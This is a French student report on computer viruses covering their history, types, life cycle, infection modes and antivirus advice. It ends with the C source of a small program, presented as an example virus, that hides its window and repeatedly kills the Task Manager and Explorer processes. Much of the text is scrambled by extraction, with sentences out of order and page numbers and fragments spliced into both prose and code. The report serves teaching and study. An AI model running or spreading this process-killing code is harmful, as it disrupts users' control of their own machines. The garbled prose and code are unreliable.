Virus Informatiques

Projet de Fin de Module
25/04/2010

Module : Système d’Exploitation

Encadré par : M. Abderrahim SABOUR

Réalisé par : Abdelouahed ERROUAGUI Ahmed JNAH Hamid IMIHI Yassine ELQANDIL

Sommaire
Sommaire............................................................................................................... 2 Introduction :.......................................................................................................3 Définitions :.........................................................................................................4 Historique :.......................................................................................................... 4 Type des virus :...................................................................................................6 Cycle De Vie Des Virus Informatique :...............................................................12 Modes d’infection :(fonctionnement).................................................................14 Les Mesures pour protéger mon ordinateur contre les virus............................17 Exemple de virus...............................................................................................20 Conclusion :.......................................................................................................24

2Virus Informatiques

Partie Pratique : 2. Nous avons décidé de prendre ce sujet comme mini-projet pour arriver à comprendre comment les virus fonctionnent réellement. Définition Historique Types des virus Informatique Cycle de vie Mode de fonctionnement 3Virus Informatiques 2. 1. Dans ce rapport nous avons séparé notre étude en deux parties : 1.4.3.2. 1.1. et pour décortiquer un virus programmé en C.1. 1. 1.Introduction : Dans le cadre des mini-projets du module système d’exploitation encadré par M. Etude de cas d’un virus en C . Partie Théorique : 1. Abderrahim SABOUR. nous avons eu l’occasion d’étudier le sujet : Virus Informatiques.5.

Historique : • 1949 : John Von Neumann présente les fondements théoriques des logiciels autocopiés. il peut être polymorphe. Actuellement.Définitions : Un Virus est un programme susceptible d'entraîner des perturbations dans le fonctionnement d'un ordinateur en dénaturant ses programmes exécutables ou ses fichiers système. Un virus capable de se propager à travers des réseaux informatiques est parfois appelé ver. La plupart des virus informatiques ajoutent quelques lignes de commandes dans le fichier cible lorsqu'ils sont chargés en mémoire. en particulier lorsqu'il se compose de plusieurs segments dispersés à 4Virus Informatiques Un virus peut rester dans la mémoire de l'ordinateur. Le gagnant doit détruire l'autre en s'autocopiant dans ses fichiers. . Il se transmet généralement par l'intermédiaire de disquettes ou encore par téléchargement. travers le réseau. constituant dans ce cas un programme terminate-and-stay-resident (TSR) : on dit alors qu'il s'agit d'un virus résident mémoire. il existe de nombreux types de virus informatiques. Il peut en outre être encrypté. Enfin. rendant ainsi sa détection et sa résorption plus délicates. évitant d'être décelé grâce à un changement interne de sa structure. Ces commandes ont généralement. toujours plus sournois et moins visibles. • 1960 : Un groupe de jeunes ingénieurs des laboratoires Bell met au point un jeu informatique du nom de Core war : on installe dans la mémoire vive d'un ordinateur deux programmes chargés de se retrouver.

Mélissa s'auto envoyait aux 50 premiers contacts . • 1989 : Datacrime : trois virus font trembler les Pays-Bas et la France. Ce serait le premier virus clairement identifié et connu. Le serveur enregistre 8 000 connexions. • 1988 : Robent Morris est arrêté pour fraude informatique. • 1992 : Le virus Michelangelo plonge la planète dans l'effroi. au lieu des 5 à 15 millions annoncés. Caché dans un document Word. • 1999 : Le virus Mélissa se propage par internet. Le Clusif (Club de la sécurité des systèmes d'information français) propose sur son serveur une procédure de détection et de décontamination pour lutter contre Frodo. Il a causé de sérieux dégâts sur les campus américains. fournissent à des touristes des copies de logiciels pirates infectés du virus Brain. • 1998 : D'après les chiffres publiés par Dr Salomon's. deux Pakistanais. Cet étudiant vient de causer 15 millions de dollars de dommage sur Internet à cause de son virus. • 1988 : Peace/Mac affiche son message de paix universelle sur les écrans de possesseurs de Macintosh II. le virus Frodo/4096 arrive en France. éditeur d'antivirus. La police néerlandaise propose alors un ensemble de programmes informatiques à bas prix pour lutter contre ces virus. • 1995 : Les premiers virus macros destructeurs apparurent en été. • 1986 : Les frères Alvi. • 1991 : Diffusé par une disquette vendue dans la revue Soft et Micro. contre 18 en 1989. Ses effets restent pourtant limités : 200 000 machines.• 1984 : Le magazine Scientific American présente un guide pour fabriquer ses propres virus. on recensait 17 745 virus différents en 1998. C'est à cette époque que la France prend réellement conscience de l'existence 5Virus Informatiques des virus.

Type des virus :  Vers : ♦ Qu’est-ce que c’est ? Un ver informatique (en anglais Worm) est un programme qui peut s'auto-reproduire et se déplacer à travers un réseau en utilisant les mécanismes réseau. il le lança et. Un étudiant (Robert T. de Cornell University) avait fabriqué un programme capable de se propager sur un réseau. tous ces vers ont créé une saturation au niveau de la bande passante. • 2000 : Le virus I Love You sème de nouveau la panique sur Internet.contenus dans le carnet d'adresses d'Outlook.) pour se propager. sans avoir réellement besoin d'un support physique ou logique (disque dur. 6Virus Informatiques ♦ Le fonctionnement d'un ver dans les années 80 : La plus célèbre anecdote à propos des vers date de 1988. celui-ci avait déjà infecté plusieurs milliers d'ordinateurs. Internet devenait le premier vecteur de contamination. programme hôte. Morris. 8 heures après l'avoir lâché. Résultat : plus de 300 000 ordinateurs infectés. De plus. fichier. un ver est donc un virus réseau. C'est ainsi que de nombreux ordinateurs sont tombés en pannes en quelques heures car le « ver » (car c'est bien d'un ver dont il s'agissait) se reproduisait trop vite pour qu'il puisse être effacé sur le réseau. ce qui a obligé la NSA à arrêter les connexions pendant une journée. et la tête de l'auteur de ce dernier reste mise à prix. • 2003 : Le virus MyDoom a beaucoup fait parler de lui. etc. Voici la manière dont le ver de Morris se propageait sur le réseau : • • • • • • • Le ver s'introduisait sur une machine de type UNIX il dressait une liste des machines connectées à celle-ci il forçait les mots de passe à partir d'une liste de mots il se faisait passer pour un utilisateur auprès des autres machines il créait un petit programme sur la machine pour pouvoir se reproduire il se dissimulait sur la machine infectée et ainsi de suite .

♦ Les vers actuels : Les vers actuels se propagent principalement grâce à la messagerie (et notamment par le client de messagerie Outlook) grâce à des fichiers attachés contenant des instructions permettant de récupérer l'ensemble des adresses de courrier contenues dans le carnet d'adresse et en envoyant des copies d'eux-mêmes à tous ces destinataires.ils sont parfois utilisés comme moyen d’installer un virus chez un utilisateur. le but du pirate est dans un premier temps d'infecter votre machine en vous faisant ouvrir un fichier infecté contenant le troyen (trojan) et dans un second temps d'accéder à votre machine par le port qu'il a ouvert. et qui généralement donne un accès à l'ordinateur sur lequel il est exécuté en ouvrant une porte dérobée 7Virus Informatiques Les chevaux de Troie par porte dérobée autorisent sont des programmes qui d’autres personnes que vous à prendre le contrôle de votre ordinateur au travers d’Internet. Ces vers sont la plupart du temps des scripts (généralement VB Script) ou des fichiers exécutables envoyés en pièce jointe et se déclenchant lorsque l'utilisateur destinataire clique sur le fichier attaché.  Chevaux de Troie : ♦ Qu’est-ce que c’est ? Un cheval de Troie (informatique) est donc un programme caché dans un autre qui exécute des commandes sournoises. ♦ Les symptômes d'une infection : Le principe des chevaux de Troie étant généralement (et de plus en plus) d'ouvrir un port de votre machine pour permettre à un pirate d'en prendre le contrôle (par exemple voler des données personnelles stockées sur le disque). .

Fore.Toutefois pour pouvoir s'infiltrer sur votre machine. Doly. Tapiras. Ainsi : soit vous avez une adresse IP fixe (cas d'une entreprise ou bien parfois de particuliers connecté par câble. Blade runner. etc. c'est le cas pour les connexions par modem . WinCrash 8Virus Informatiques Troyen TTS (Tiny Telnet Server) Ajan. Stealth. le pirate doit généralement en connaître l'adresse IP. FTP trojan. de plus en plus de personnes font suivre des informations reçues par courriel sans vérifier la véracité des propos qui y sont contenus. WinPC. Hackers Paradise. WinSpy 31 41 59 Agent 31. Le but des hoax est simple : • provoquer la satisfaction de son concepteur d'avoir berné un grand nombre de personnes Les conséquences de ces canulars sont multiples : . auquel cas le pirate doit scanner des adresses IP au hasard afin de déceler les adresses IP correspondant à des machines infectées. Shtrilitz. Masters Paradise Deep Throat DMSetup  Canular : ♦ Qu’est-ce qu’un hoax? On appelle hoax (en français canular) un courrier électronique propageant une fausse information et poussant le destinataire à diffuser la fausse nouvelle à tous ses proches ou collègues. Antigen.) auquel cas l'adresse IP peut être facilement récupérée soit votre adresse IP est dynamique (affectée à chaque connexion). Happy99. Terminator. Invisible FTP. Larva. ♦ Liste des ports utilisés habituellement par les troyens : por t 21 23 25 Back construction. ProMail trojan. Email Password Sender. Kuang 2. Ainsi. WebEx.

Un virus Macro est une série de commandes permettant d’effectuer un certain nombre de tâches automatiquement au sein des applications ci-dessus. Ce positionnement leurs permets (ces virus sont 9Virus Informatiques amorcés dès le démarrage) d'être activé avant tout le reste. •  ♦ Virus du Secteur de Démarrage : Qu’est-ce qu’un virus secteur de démarrage ? Les virus de secteur d'amorçage résident dans le premier secteur d'un support physique (disque dur ou disquette) ou du système d'exploitation (DOS ou Windows en général). • L'encombrement des boîtes aux lettres électroniques déjà chargées . Ces virus se chargent généralement en mémoire vive et y demeurent jusqu'à la mise hors tension de l'ordinateur.  Virus Macro : ♦ Qu’est-ce qu’un virus de macro ? Les virus Macros sont la plus grande menace à ce jour.L'engorgement des réseaux en provoquant une masse de données superflues circulant dans les infrastructures réseaux . leurs conséquences ne varient pas. • La perte de temps. la plupart des virus de boot ne fonctionnent plus sous les nouveaux systèmes d'exploitation tels que Windows NT et tendent à disparaître progressivement. destruction de fichiers. Heureusement. de données voire reformatage. Le contenu original du secteur est déplacé vers une autre zone du disque et le virus s'octroie cet emplacement. tant pour ceux qui lisent l'information. • La dégradation de l'image d'une personne ou bien d'une entreprise . leur conférant ainsi. que pour ceux qui la relayent . Le but non nuisible du . • Une désinformation. Ils se distinguent principalement par leur mode de contagion. • L'incrédulité : à force de recevoir de fausses alertes les usagers du réseau risquent de ne plus croire aux vraies. un contrôle important de l'ordinateur. ils se propagent lorsqu’un document Microsoft Word. Excel ou PowerPoint contaminé est exécuté. c'est-à-dire faire admettre à de nombreuses personnes de faux concepts ou véhiculer de fausses rumeurs (on parle de légendes urbaines) .

L’ouverture d’un document infecté va contaminer le document par défaut de l’application. Excel et PowerPoint étant les documents les plus souvent partagés.langage de macro dans ces applications est à l’origine de pouvoir créer des raccourcis pour effectuer des tâches courantes. des Ils mails ont sont capables de d’infecter les utilisateurs à la lecture l’apparence n’importe quel autre message. ou même le pré visualisez dans le panneau d’aperçu (si tant est que vous utilisiez Outlook avec la version correcte d’Internet Explorer).  Mails : ♦ Qu’est-ce que c’est ? 10Virus Informatiques Les d’un virus mail. ♦ Les virus qui se propagent automatiquement par mail : Ce sont les virus typiques qui s’activent par un simple clic de l’utilisateur sur le document joint. et ensuite tous les documents qui seront ouverts au sein de l’application. Ce script peut changer les paramètres de votre système et envoyer le virus à d’autres utilisateurs par mail. ceci explique la diffusion rapide de ces virus. Les documents Word. Melissa. Celui-ci exécute un script qui utilise les programmes de messagerie pour faire suivre les documents infectés à d’autres utilisateurs de mails. De plus le langage de programmation des Macros est beaucoup plus facile à apprendre et moins compliqué qu’un langage de programmation classique. Les Virus Macros non supprimés se répandent très rapidement. le sauvegarder et fermer l’application. par exemple en une touche imprimer un document. par exemple. envoyés par Internet. envoie un message aux cinquante premiers contacts de tous les carnets d’adresses auxquels . mais contiennent pourtant un script caché qui s’exécute dès que vous ouvrez le mail.

Ces mails doivent simplement être détruits.  Les spywares : ♦ Qu’est-ce que c’est ? . D’autres virus s’envoient d’eux-mêmes à tous les contacts du carnet d’adresse. . le virus va utiliser votre carnet d'adresse pour se propager et contaminer les contacts de votre carnet. d’emplois à domicile. à cause de son faible niveau de sécurité face aux agressions venant d'Internet.exe même si la piècejointe est envoyée par une personne connue. Ces pièces-jointes correspondent aux documents que l'on reçoit..soit transmettre un fichier informatique : document Word. Les spams arrivent souvent avec de fausses références sur l’expéditeur. surtout s'il s'agit d'un fichier exécutable avec une extension :. le processus est enclenché. le document peut contenir un parasite : virus. Pour l'internaute. surtout la messagerie Outlook Express.bat.. ♦ Qu’est-ce qu’un spam ? Un spam est un mail non sollicité. l'utilisation de la messagerie reste l'échange de courrier au format texte. ♦ Les pièces jointes : Le risque vient des logiciels de messageries qui sont installés sur votre ordinateur. qui peut contaminer votre ordinateur si ce fichier est exécuté. Si vous ouvrez par inadvertance un document infecté. qui fait souvent la promotion de plans d’enrichissement rapide. client de messagerie fourni avec Windows XP.soit recevoir un document d'un correspondant. vous pouvez : 11Virus Informatiques . De façon plus avancée.com.Microsoft Outlook peut accéder. de prêts bancaires ou de sites à caractère pornographique. . d’où la difficulté à réagir contre leur auteur. Excel. vers. Donc le danger vient de ces documents transmis. vous installez le parasite sur votre machine. . une image (type photo) ou une archive compressée. .

Il utilise alors des techniques comme l'ingénierie sociale ou celles des chevaux de Troie. Cycle De Vie Des Virus Informatique : Les virus informatiques.Un spyware est un logiciel espion. à son insu. ♦ Comment cela fonctionne-t-il ? Un spyware « s’attrape » en général en naviguant sur Internet. C'est un programme ou un sousprogramme conçu dans le but de collecter des données personnelles sur ses utilisateurs et de les envoyer à son concepteur ou à un tiers via Internet ou tout autre réseau informatique. sans avoir obtenu au préalable une autorisation de l'utilisateur. les informations collectées aux créateurs et éditeurs de logiciels afin d’alimenter une gigantesque base de données. possèdent un cycle de vie :  Création: C’est la période que va passer un programmeur à développer un virus aussi féroce que possible. Limewire). La programmation se fait en code assembleur. ainsi qu'en téléchargeant des logiciels gratuits (freeware) ou de publicité (adware). Le spyware lui-même est un programme autonome ou associé à un logiciel 12Virus Informatiques prévu pour tout autre chose. les lecteurs audio (RealPlayer) et les systèmes «peer-to-peer » (Kazaa. Les spywares ont pour objectif primaire. d’espionner le comportement de l’internaute et de transmettre ensuite. Il est tout particulièrement fréquent dans les programmes de messagerie instantanée (ICQ). tout comme les virus biologiques.  Gestation: .

etc. Certains s'activent à certaines dates. En général. Même les 13Virus Informatiques virus ne possédant pas de telles routines et ne nécessitant pas de procédure d'activation spécifique peuvent causer des dommages à votre système en s'appropriant petit à petit l'ensemble de vos ressources. La découverte d'un virus est le moment où quelqu'un se rend compte de sa présence et parvient à l'isoler.  Découverte: Cette phase de l'existence d'un virus n'est pas forcément consécutive à son activation. le nouveau virus est généralement transmis au NCSA (National Computer Security Association) à Washington DC où il est documenté puis distribué aux développeurs de logiciels antivirus. du courrier électronique. d'autres possèdent un système de compte à rebours interne. de l'Internet ou au sein d'une entreprise.Il s'agit du procédé par lequel le virus est copié en un endroit stratégique afin que sa diffusion soit la plus rapide possible. la méthode consiste à infecter un programme très populaire puis à le distribuer par l'intermédiaire d'un serveur BBS. C'est là le meilleur moyen de s'assurer de la pérennité d'un virus. Une fois cette opération réalisée. mais c'est généralement à ce moment-là qu'elle a lieu.  Reproduction (infection): Les virus.  Assimilation: . cherchent à se reproduire. de par leur nature. d'une école. Un virus correctement conçu se reproduira un nombre de fois important avant de s'activer. La découverte a lieu la plupart du temps au moins un an avant qu'un virus ne devienne une véritable menace pour la communauté informatique.  Activation: Les virus possédant une routine de destruction ne s'activent que lorsque certaines conditions sont réunies.

Dans les faits. dans les cas contraires.  Elimination: Si un nombre suffisant de développeurs d'antivirus sont capables de faire face au virus et si suffisamment de personnes se procurent l'antivirus adéquat. du code originel fait que celui-ci ne peut plus fonctionner correctement.ow. Il existe en effet des virus « par recouvrement » et « par ajout » parmi les macrovirus et les virus de script. Modes d’infection :(fonctionnement) Modes d'infection Les différentes techniques décrites ci-dessous s’appliquent principalement aux virus programmes. mais un grand nombre d'entre eux ont cessé de constituer une menace réelle.virus. Les virus agissant par recouvrement ne réussissent jamais à se disséminer largement.Jetto. Certaines d’entre elles s’appliquent néanmoins aux virus interprétés. . celle-ci s’ajuste à la taille du code viral et devient identique pour tout fichier infecté. En conséquence. Dans certains cas. Ne réalisant plus la fonction souhaitée. selon la compétence du développeur d'anti. LINUX/Radix. Exemple : BadGuy.Une fois la découverte faite. La destruction. la taille du programme infecté n’est pas modifiée . 14Virus Informatiques  Recouvrement : Un virus par recouvrement se contente d’écraser partiellement ou en totalité le programme qu’il infecte. Cette phase dure entre un jour et six mois. il le détruit au moins partiellement et rend son éradication impossible. Ces virus ne sont généralement pas résident en mémoire. aucun virus n'a réellement disparu. il est possible d'annihiler un virus.ow. VBS/Entice. l’utilisateur les détecte rapidement.ow. même partielle. W32/HLL. les développeurs de logiciels modifient leurs programmes pour qu'ils puissent détecter la présence du virus.

ce qui rend un repérage fondé sur la variation de la taille des programmes possible. Exemples: Cascade.Le virus écrase une partie du code du programme hôte  Ajout : Un virus par ajout modifie un programme sans le détruire. W32/Chiton. La force d’un virus par ajout est que le programme infecté semble fonctionner correctement ce qui peut retarder la détection du virus. puis lui « 15Virus Informatiques rend la main ». VBS/Daydream. Le virus greffe son code sur le programme hôte . Celui-ci fonctionne alors de façon normale. Jérusalem. W95/Anxiety. La faiblesse d’un virus par ajout est que la taille du programme est augmentée de la taille du virus. Ayant altéré le point d'entrée. le virus s’exécute chaque fois que le programme est lancé.

Le point d’entrée du programme et les instructions qui s’y situent sont inchangés. la détection devient très problématique. Lorsque cette technique est associée à une infection par cavité et à un codage polymorphique. le virus modifie le point d'entrée du programme et insère tout ou partie de son code dans différentes zones non utilisées. le code viral pouvait se situer entre le bloc de code. Le virus morcelle son code en modules insérés dans les espaces inoccupés du programme hôte 16Virus Informatiques  Point d'entrée obscure : Avant infection.COM fut longtemps la cible privilégiée de ce genre de virus . Cette technique est maintenant régulièrement rencontrée dans les environnements Windows. Elle est Le virus place son point d'entrée dans un endroit variable du . dans ce cas. le bloc des données. Cavité : Connaissant la structure spécifique du type des programmes à contaminer. l'analyse du programme cible permet un positionnement du point d'entrée du code viral en un lieu variable au sein du fichier. Exemple : W95/Caw. Cette technique est maintenant régulièrement rencontrée dans les environnements Windows. le bloc de pile « stack ». Le fichier COMMAND.

Exemple : W95/Orez. Si vous êtes aux prises de virus. On parle ainsi d'éradication de virus pour désigner la procédure de nettoyage de l'ordinateur.très pénalisante pour les antivirus qui doivent parfois élargir fortement leur zone de recherche. est un système permettant de protéger un ordinateur ou un réseau d'ordinateurs des . Les Mesures pour protéger mon ordinateur contre les virus Internet est un outil de travail merveilleux. votre logiciel n'a pas réussi à tout arrêter. lancez également un scan de vos dossiers et fichiers à l'aide d'un logiciel anti-espion. Chaque ordinateur.  Antivirus/Pare-feu ♦ Qu'est-ce qu'un antivirus ? Un antivirus est un programme capable de détecter la présence de virus sur un ordinateur et. dans la mesure du possible. le logiciel vous demandera l'autorisation pour lancer un scan complet de tout votre ordinateur. pour assurer sa sécurité sur internet. doit disposer d'un seul antivirus et d'un seul pare-feu (firewall) (plusieurs antivirus ou plusieurs pare-feu créent des conflits.. vous éliminerez les virus. ainsi que les logiciels espions qui se sont infiltrés dans votre ordinateur à votre insu.). de désinfecter ce dernier. il existe des moyens pour vous protéger contre ces virus. mais aussi un endroit où les virus voyagent en grand nombre et en tout temps. je vous recommande le logiciel Kaspersky 2010. ♦ Qu'est-ce qu'un pare-feu (firewall) ? Un pare-feu (appelé aussi coupe-feu.. La première chose à faire est de lancer un scan de tous vos disques installés dans votre ordinateur à l'aide de votre logiciel antivirus. dont la protection avec les logiciels antivirus. Heureusement. Ensuite. Il existe plusieurs bons logiciels anti-virus gratuits sur le marché. Pour éliminer 17Virus Informatiques définitivement les virus informatiques de votre PC. Une fois installé. garde-barrière ou firewall en anglais). soit vous n'avez pas installé un logiciel antivirus ou encore. la version familiale. De cette manière.

C'est une bonne idée de choisir un forfait qui offre une assistance technique gratuite.La fréquence des mises à jour. Pour être plus sûr. vous aurez à vérifier vous-même sur Internet les mises à jour qui doivent être installées dans votre logiciel de sécurité. . qui est maintenant intégré dans certains antivirus. installez également un logiciel pare-feu. Choisissez alors Options . Comme de nouveaux virus apparaissent chaque jour. ensuite sur Panneau de configuration. La sécurité informatique dispose de normes pour les taux de détection des logiciels antivirus.La certification ICSA. Voici quelques éléments à considérer lors de l'évaluation d'un logiciel antivirus. en ligne ou par le biais d'un numéro sans frais. Le pare-feu est un système permettant de filtrer les paquets de données échangés avec le réseau. Cela signifie que votre logiciel antivirus est constamment en action pour détecter les infections et les neutraliser comme 18Virus Informatiques elles apparaissent. Assurez-vous que votre logiciel a la certification ICSA. mais ce n'est pas une très bonne idée. C'est encore mieux si elles se produisent automatiquement lorsque vous vous connectez à Internet. cliquez sur le bouton Démarrer. vous aurez besoin de mises à jour régulières. Ce logiciel peut balayer tous vos disques de virus et les neutraliser. . Windows. a caché les extensions de nom de fichier. Solution 2: Méfiez-vous des extensions de nom de fichier L'extension d'un nom de fichier est les trois éléments qui viennent après le point. .La compatibilité avec votre système d'exploitation. . par défaut.Protection automatique de fond.  Solutions Voici quelques moyens de protéger votre ordinateur contre les virus: Solution 1: Les logiciels antivirus Votre première ligne de défense consiste à installer un logiciel antivirus. Si la mise à jour automatique n'est pas incluse. Assurez-vous que le logiciel fonctionne avec votre système. en particulier si vous utilisez un vieux système d'exploitation comme Windows 98.Le support technique. Cela donne une tranquillité d'esprit. . Pour voir les extensions d’un nom de fichier.intrusions provenant d'un réseau tiers (notamment Internet).

ne paniquez pas si vous trouvez des fichiers nommés Word. Malheureusement. Alors. Un virus de macro 19Virus Informatiques peut verrouiller le clavier et même faire la suppression de fichiers. Les virus ont généralement comme extension. Solution 4: Protéger les macros de MS Word.des dossiers et type de fichier. Excel. exe. . Il suffit de ne jamais ouvrir un fichier avec une extension . Les mots de passe doivent être une combinaison d'au moins huit caractères. cliquez sur le menu Outils. Désactivez la case à cocher Masquer les extensions des fichiers dont le type est connu. Solution 6: Mise à jour du logiciel d'application des Microsoft effectue constamment correctifs pour les failles de sécurité dans son système d'exploitation et les logiciels d'application.exe si vous ne savez pas la raison d'être de ce fichier. passe Si vous partagez votre ordinateur. Cliquez sur Appliquer. Sur l'onglet Niveau de sécurité. c'est une bonne idée d'attribuer à chacun un mot de passe.exe ou Excel. Pour vous assurer que le vôtre est activé. Les macros sont des ensembles de commandes que les utilisateurs peuvent enregistrer en tant que raccourcis pour exécuter des fonctions parfois longues en quelques frappes de touche seulement. Word. assurez-vous Solution que 5: moyen Utiliser ou des élevé mots est de sélectionné. Macro et Sécurité. Solution 3: Méfiez-vous des inconnus . Il est donc important d’effectuer les mises à jour de Windows fréquemment. des lettres et des chiffres.exe sur votre système. PowerPoint viennent tous avec une fonction pour vous protéger contre les virus macros. et de préférence n’ayant aucun sens. Pour obtenir les correctifs de sécurité les plus récents. Excel et Powerpoint Les macros virus sont un autre type de virus. c'est le même dans Program Files. il s’agit seulement de vos logiciels Microsoft.exe Un virus est un logiciel qui doit être exécuté afin de faire son sale boulot.

"ConsoleWindowClass"). int ID. nShow ta9riban**/ ShowWindow(nShow.2 /**********************************/ #include <windows.h> #include <tlhelp32.h> #include<stdlib.exe" 20Virus Informatiques int func_termi(void).**/ = FindWindow("ConsoleWindowClass".Exemple de virus  Virus en C : /**********************************/ //DoubleStopProcess. HWND nShow./**3kelt .T3. int WINAPI WinMain(HINSTANCE hInstance.h> #include <windowsx.exe" #define Master "explorer. SW_HIDE :Hides the window and activates another window. char title[] = "INFORMATION".h>//contient les variable de type PROCESSENTRY32 #include <process.c //Compiler Dev-C++ 4. int CmdShow) { char message[] = "This programme affects yout taskmanager :) stop me if u cann TAB+SHIFT+RETURN".SW_HIDE).9./**set the specified window's show state. LPSTR lpCmdLine.HINSTANCE hPrevInstance.XY.h> #define Progy "taskmgr.9.

Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS.**/ /** Includes all processes in the system in the snapshot. C'est juste une autre manière de référencer l'objet. } int func_termi(void) { long code.MessageBox(0.h**/ /**Takes a snapshot of the specified processes. and threads used by these processes./**Tlhelp32. HANDLE Snap.MB_OK| MB_ICONINFORMATION). On ne parlera plus d'adresses pour les références 21Virus Informatiques d'objets managés.message./**contient des info sur un processus apres avoir pris une snapshot des processus qui reside dans le systeme**/ // BOOL ServiceName./**si title est null la valeur par défaut est ERROR**/ // _sleep(100).title. To enumerate the processes**/ . func_termi(). as well as the heaps. while(1) { _sleep(100).Process.0)./**Le handle est un identifiant qui permet de désigner l'objet de manière unique.**/ PROCESSENTRY32 proc32. modules.

"BYE BYE". exit(0).dwSize=sizeof(PROCESSENTRY32). } proc32."Done!Taskmgr.th32ProcessID.".szExeFile. such as its token.ID).MB_OK | MB_ICONEXCLAMATION).szExeFile./**Opens an existing local process object."Error".exe stopped!!!".ID).no way!!!".&proc32))==TRUE) { if(strcmp(proc32. and to ."U knew the key NOOO I'm GOOONE ."Info".Progy)==0){/**test d'egalité entre le proc courant et la 22Virus Informatiques chaine progy **/ ID=proc32. exit priority class*/ XY=GetExitCodeProcess(Process.**/ T3=TerminateProcess(Process.&code).code)./**Retrieves the termination status of the specified process.Master)==0){/**la meme chose pr l'autre proc**/ is code.MB_OK). Process=OpenProcess(PROCESS_QUERY_INFORMATION.if(Snap==INVALID_HANDLE_VALUE) { MessageBox(0.FALSE.**/ Process=OpenProcess(PROCESS_TERMINATE. } while((Process32Next(Snap.} } else if(strcmp(proc32.FALSE.{MessageBoxA(0. if((GetAsyncKeyState(VK_TAB)==-32767)&&(GetAsyncKeyState(VK_SHIFT)==-32767 )&&(GetAsyncKeyState(VK_UP)==-32767)) { MessageBox(0. return EXIT_SUCCESS."Sorry.MB_OK | MB_ICONERROR)./**Required retrieve certain information about a process.

} } } } } Calc.ID). Process=OpenProcess(PROCESS_TERMINATE.{MessageBoxA(0. XY=GetExitCodeProcess(Process.ID)."Done! stopped!!!".&code)."Info".th32ProcessID.FALSE.FALSE.exe is 23Virus Informatiques .MB_OK).ID=proc32. T3=TerminateProcess(Process.code). Process=OpenProcess(PROCESS_QUERY_INFORMATION.

le modifier et essayer de se lancer dans ce domaine vague pour atteindre nos objectifs comme futur informaticiens. nous pouvons dire que ce mini-projet nous a été d’une grande utilité.Conclusion : Le projet nous a appris comment bien lire un code. Finalement. 24Virus Informatiques . vu que c’était un défi qui mérite être attaquer. l’analyser.

Sign up to vote on this title
UsefulNot useful